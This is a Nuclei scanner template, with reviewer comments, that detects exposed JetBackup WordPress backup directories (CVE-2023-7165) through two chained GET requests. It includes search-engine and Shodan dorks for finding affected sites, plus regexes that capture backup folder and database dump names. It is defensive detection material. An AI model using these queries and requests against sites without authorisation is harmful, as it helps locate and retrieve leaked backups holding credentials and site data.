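# Nuclei template: detects JetBackup (WordPress) backup directories that are
# exposed through web-server directory listing (CWE-548).
#
# Detection is two chained GET requests (see `flow`):
#   1. confirm /wp-content/uploads/jetbackup/ renders a directory index and
#      capture the name of a backup sub-folder from it;
#   2. confirm that sub-folder is itself listed and contains a backup archive.
# Only request 2 produces a reported finding; request 1 is an internal gate.
id: CVE-2023-7165

info:
  name: JetBackup <= 2.0.9.7 - Sensitive Information Exposure via Directory Listing
  author: pussycat0x
  severity: high
  # The affected range is written as "before 2.0.9.9" so that it agrees with
  # the remediation text below, which names 2.0.9.9 as the fixed release.
  description: |
    JetBackup WordPress plugin before 2.0.9.9 does not use index files to prevent directory listing in certain configurations, letting malicious actors leak backup files, exploit requires access to the web server.
  impact: |
    Attackers can access and leak sensitive backup files, potentially leading to data exposure and security breaches.
  # Reviewer caveat: the plugin update only adds index files. Where a finding
  # is confirmed, also disable auto-indexing at the web server (for example
  # Apache `Options -Indexes`, nginx `autoindex off`), move or delete backups
  # that were already reachable, and treat credentials stored in those
  # backups as exposed.
  remediation: |
    Update to version 2.0.9.9 or later that implements index files to prevent directory listing.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup/jetbackup-wp-backup-migrate-restore-2097-sensitive-information-exposure-via-directory-listing
    - https://wpscan.com/vulnerability/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe/
    - https://plugins.trac.wordpress.org/changeset/3016772/backup
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7165
    cwe-id: CWE-548
    cpe: cpe:2.3:a:developer177:jetbackup:*:*:*:*:*:wordpress:*:*
    epss-score: 0.01915
    epss-percentile: 0.77323
  metadata:
    verified: true
    max-request: 2
    vendor: jetbackup
    product: jetbackup
    framework: wordpress
    publicwww-query: "/wp-content/plugins/backup/"
    fofa-query: body="/wp-content/plugins/backup/"
    google-query: inurl:"/wp-content/uploads/jetbackup/"
    shodan-query: http.html:"/wp-content/plugins/backup/"
  tags: cve,cve2023,wordpress,wp-plugin,jetbackup,wp,unauth

# Request 2 runs only if request 1 matched.
flow: http(1) && http(2)

http:
  # Request 1: is the JetBackup upload directory rendered as a listing?
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/jetbackup/"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      # Internal matcher: gates the flow, is not reported as a result.
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Index of","jetbackup")'
        condition: and
        internal: true

    extractors:
      # Captures the first listed entry whose name contains "_D" followed by
      # 14 digits; the value feeds {{folder_name}} in request 2.
      - type: regex
        name: folder_name
        part: body
        group: 1
        regex:
          - 'href="([^"]*_D\d{14}[^"]*)/"'
        internal: true

  # Request 2: is the backup sub-folder listed, with an archive inside?
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/jetbackup/{{folder_name}}/"

    host-redirects: true
    max-redirects: 2

    matchers:
      # This is the only matcher that yields a finding, so it checks for the
      # listing marker as well as the archive extension: a 200 page that
      # merely mentions ".sgbp" is not evidence of directory listing.
      - type: dsl
        dsl:
          - 'contains_all(body, "Index of", ".sgbp")'
          - 'status_code == 200'
        condition: and

    extractors:
      # NOTE(review): no later request consumes `database_dump`, and the
      # extractor is marked internal, so the captured name does not appear
      # to reach the report. Confirm whether this is intentional.
      - type: regex
        name: database_dump
        part: body
        group: 1
        regex:
          - 'href="([^"]+_database\.sql)"'
        internal: true
# NOTE(review): the digest below is a signature over the template body. It
# does not cover any edit made to this file; re-sign after changing anything
# above, otherwise the template will load as unverified.
# digest: 4a0a0047304502202112b401e18376ffe8f5592239b9c89f1e40501d5719df7ffe68b8eabbfb0526022100dd63e36ee2a465f2ad69eec59cdc21e3a6a2e3242f5d29229db0991f547e3c71:922c64590222798bb761d5b6d8e72950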